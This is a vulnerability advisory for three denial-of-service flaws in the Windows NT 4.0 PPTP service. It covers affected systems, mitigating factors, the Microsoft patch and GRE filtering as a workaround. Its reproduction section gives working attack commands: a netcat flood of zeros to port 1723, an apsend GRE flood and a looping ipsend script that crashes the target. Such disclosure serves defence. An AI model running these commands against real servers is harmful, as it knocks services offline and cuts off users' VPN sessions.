COMMAND
PPTP
SYSTEMS AFFECTED
Windows NT 4.0 servers running PPTP
PROBLEM
Kirk Corey found following. The PPTP service in Windows NT 4.0
has a flaw in a part of the code that handles a particular type
of data packet, which results in a leak of kernel memory. If a
sufficient number of packets containing a specific malformation
were received by an affected server, kernel memory would
eventually become exhausted. The likely outcome would be that the
server would either hang or fail altogether. In either case, the
machine would need to be rebooted to restore normal operation, and
any PPTP sessions underway at the time would be lost. It would
not be necessary for the attacker to establish a valid PPTP
session in order to exploit the vulnerability.
Mitigating Factors:
- The vulnerability does not threaten the security of data within
PPTP sessions -- it is strictly a denial of service
vulnerability.
- Only Windows NT 4.0 machines running the PPTP service are at
risk. The service does not run by default.
- The Windows 2000 PPTP service is not affected by the
vulnerability.
The bulletin/faq only lists NT Server versions as vulnerable. In
fact, NT Workstation is also vulnerable if PPTP is configured in
server mode (i.e., configured to accept an incoming PPTP
connection). If your NT Workstation is configured in this way,
it may need to be patched.
Also, the faq states that several hundred packets are not enough
to exploit the vulnerability. Actually, the patch fixes two
vulnerabilities in the NT PPTP component, one of which requires
e.g., 400,000 packets to exploit, and the other only about 10-50.
PPTP (Point-to-Point Tunneling Protocol) is a networking
technology that is used to create VPNs. The protocol uses TCP
(port 1723) and GRE to perform its work. PPTP is specified in
RFC 2637 (see http://www.ietf.org/rfc/rfc2637.txt )
This advisory presents three separate vulnerabilities. All three
vulnerabilities affect Windows NT 4.0 Workstation and Server
computers configured to accept incoming PPTP connections. The
first vulnerability involves malformed TCP packets; this
vulnerability only affects certain hardware, and only affects
systems pre-SP6. The second and third vulnerabilities involve
malformed GRE packets; these affect computers with any Service
Pack.
Steps to reproduce (exploits) - tools needed:
- Unix box (e.g., Linux, *BSD)
- netcat ( http://www.l0pht.com/~weld/netcat/ or
- http://www.securityfocus.com/tools/137 )
- apsend ( http://www.elxsi.de/ or http://www.securityfocus.com/tools/976 )
- ipsend ( http://coombs.anu.edu.au/%7Eavalon/ or http://www.securityfocus.com/tools/129 )
Vulnerability 1: TCP Port 1723
===============================
This vulnerability only applies to machines prior to SP6. Not all
machines are affected; it appears there may be some BIOS or other
issue at work here. To reproduce, enter the following on the Unix
box:
nc <ip address> 1723 < /dev/zero
If vulnerable, the target host will blue screen in a few seconds
with an error such as:
STOP 0x0A (0x0, 0x2, 0x0, 0x0)
IRQL_NOT_LESS_OR_EQUAL
Again, this vulnerability is machine-dependant; a list of tested
hardware and results can be found in the online version of this
advisory at
http://www.dsi-inc.net/dsi/pptp_security_report.shtml
Vulnerability 2: GRE
=====================
This vulnerability applies to all service packs. To reproduce, on
the target machine, open task manager and select the performance
tab. Also, open a DOS window (Start: Run: cmd). On the Unix box:
apsend -d <ip address> --protocol 47 -m 0 -q
On the target host, you will see the numbers for kernel memory
slowly rise in task manager. Eventually, these numbers will stop
increasing; at this point, CPU may hit 100% for some period of
time. Now try issuing a command such as DIR at the command
prompt; you'll see a message indicating the OS isn't able to
complete the command. Also, you may find the following in your
System event log:
Event ID: 2000 "The server's call to a system service failed unexpectedly."
and/or
Event ID: 2019 "The server was unable to allocate from the system nonpaged pool because the pool was empty."
Eventually, the target host may reboot/blue screen, or it may
simply remain in an unusable state. As noted by Microsoft in
their description of the issue, a large number of packets is
required. For a server with 64 MB RAM installed, something on the
order of 350,000 to 400,000 packets is needed. Note that the
effect is cumulative; e.g., an attacker could send 200,000 packets
at 10 A.M. and 200,000 at 2 P.M.
Vulnerability 3: GRE
=====================
This vulnerability also applies to all service packs. To
reproduce, on the Unix box:
#!/bin/csh
foo:
ipsend -i <interface> -P gre <ip address> > /dev/null
goto foo
The target host will blue screen quickly. Approximately 50
packets are required.
SOLUTION
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms01-009.asp
for information on obtaining this patch. No versions of Windows
2000 are believed vulnerable.
As a workaround, it is possible to filter GRE by source address
at your perimeter. However, since GRE is a connectionless
protocol, source address spoofing is trivial. Thus, if an
attacker can guess what source addresses are allowed, filtering
may not be effective.